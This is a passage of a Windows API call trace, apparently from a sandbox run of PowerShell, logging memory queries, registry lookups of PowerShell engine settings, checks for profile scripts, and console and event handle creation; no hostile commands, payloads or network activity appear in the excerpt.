lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.872] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.873] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.873] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.873] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.881] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0126.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0126.881] CoTaskMemFree (pv=0x2af7b0) [0126.890] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0126.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0126.890] CoTaskMemFree (pv=0x2af7b0) [0126.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0126.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0126.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0126.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.009] VirtualQuery (in: lpAddress=0x10ba80, lpBuffer=0x10c940, dwLength=0x30 | out: lpBuffer=0x10c940*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.016] VirtualQuery (in: lpAddress=0x10ba80, lpBuffer=0x10c940, dwLength=0x30 | out: lpBuffer=0x10c940*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.016] VirtualQuery (in: lpAddress=0x10b2d0, lpBuffer=0x10c190, dwLength=0x30 | out: lpBuffer=0x10c190*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.016] VirtualQuery (in: lpAddress=0x10b2d0, lpBuffer=0x10c190, dwLength=0x30 | out: lpBuffer=0x10c190*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d8d8 | out: phkResult=0x10d8d8*=0x310) returned 0x0 [0127.018] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d85c, lpData=0x0, lpcbData=0x10d858*=0x0 | out: lpType=0x10d85c*=0x1, lpData=0x0, lpcbData=0x10d858*=0x56) returned 0x0 [0127.018] CoTaskMemAlloc (cb=0x5a) returned 0x28fd10 [0127.018] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d82c, lpData=0x28fd10, lpcbData=0x10d828*=0x56 | out: lpType=0x10d82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d828*=0x56) returned 0x0 [0127.018] CoTaskMemFree (pv=0x28fd10) [0127.018] RegCloseKey (hKey=0x310) returned 0x0 [0127.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d8d8 | out: phkResult=0x10d8d8*=0x310) returned 0x0 [0127.018] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d85c, lpData=0x0, lpcbData=0x10d858*=0x0 | out: lpType=0x10d85c*=0x1, lpData=0x0, lpcbData=0x10d858*=0x56) returned 0x0 [0127.018] CoTaskMemAlloc (cb=0x5a) returned 0x28fd10 [0127.018] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d82c, lpData=0x28fd10, lpcbData=0x10d828*=0x56 | out: lpType=0x10d82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d828*=0x56) returned 0x0 [0127.018] CoTaskMemFree (pv=0x28fd10) [0127.019] RegCloseKey (hKey=0x310) returned 0x0 [0127.019] CoTaskMemAlloc (cb=0x20c) returned 0x2ba3a0 [0127.019] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ba3a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0127.020] CoTaskMemFree (pv=0x2ba3a0) [0127.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0127.020] CoTaskMemAlloc (cb=0x20c) returned 0x2ba3a0 [0127.020] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ba3a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0127.020] CoTaskMemFree (pv=0x2ba3a0) [0127.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0127.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0127.023] SetErrorMode (uMode=0x1) returned 0x1 [0127.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d840 | out: lpFileInformation=0x10d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0127.023] SetErrorMode (uMode=0x1) returned 0x1 [0127.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0127.023] SetErrorMode (uMode=0x1) returned 0x1 [0127.024] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d840 | out: lpFileInformation=0x10d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0127.024] SetErrorMode (uMode=0x1) returned 0x1 [0127.024] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0127.024] SetErrorMode (uMode=0x1) returned 0x1 [0127.024] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d840 | out: lpFileInformation=0x10d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0127.027] SetErrorMode (uMode=0x1) returned 0x1 [0127.027] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0127.027] SetErrorMode (uMode=0x1) returned 0x1 [0127.027] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d840 | out: lpFileInformation=0x10d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0127.029] SetErrorMode (uMode=0x1) returned 0x1 [0127.038] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.038] CoTaskMemFree (pv=0x2af7b0) [0127.135] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0127.151] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0127.152] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0127.159] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0127.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0127.186] ReadFile (in: hFile=0x108, lpBuffer=0x2e1d108, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x10d698, lpOverlapped=0x0 | out: lpBuffer=0x2e1d108*, lpNumberOfBytesRead=0x10d698*=0x400, lpOverlapped=0x0) returned 1 [0127.192] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0127.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0127.194] CloseHandle (hObject=0xf) returned 1 [0127.198] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.198] CoTaskMemFree (pv=0x2af7b0) [0127.202] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.202] CoTaskMemFree (pv=0x2af7b0) [0127.204] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.204] CoTaskMemFree (pv=0x2af7b0) [0127.207] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.207] CoTaskMemFree (pv=0x2af7b0) [0127.212] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.212] CoTaskMemFree (pv=0x2af7b0) [0127.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310 [0127.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x314 [0127.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318 [0127.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0127.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x344 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x348 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b0 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0127.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0127.235] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.235] CoTaskMemFree (pv=0x2af7b0) [0127.239] SetEvent (hEvent=0x32c) returned 1 [0127.239] SetEvent (hEvent=0x310) returned 1 [0127.239] SetEvent (hEvent=0x314) returned 1 [0127.240] SetEvent (hEvent=0x318) returned 1 [0127.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0127.242] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.242] CoTaskMemFree (pv=0x2af7b0) [0127.242] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x370) returned 0x0 [0127.242] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0238.385] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0238.391] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0238.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0238.397] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0238.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0238.403] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0238.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0238.405] CloseHandle (hObject=0xf) returned 1 [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x16c [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x170 [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=0, 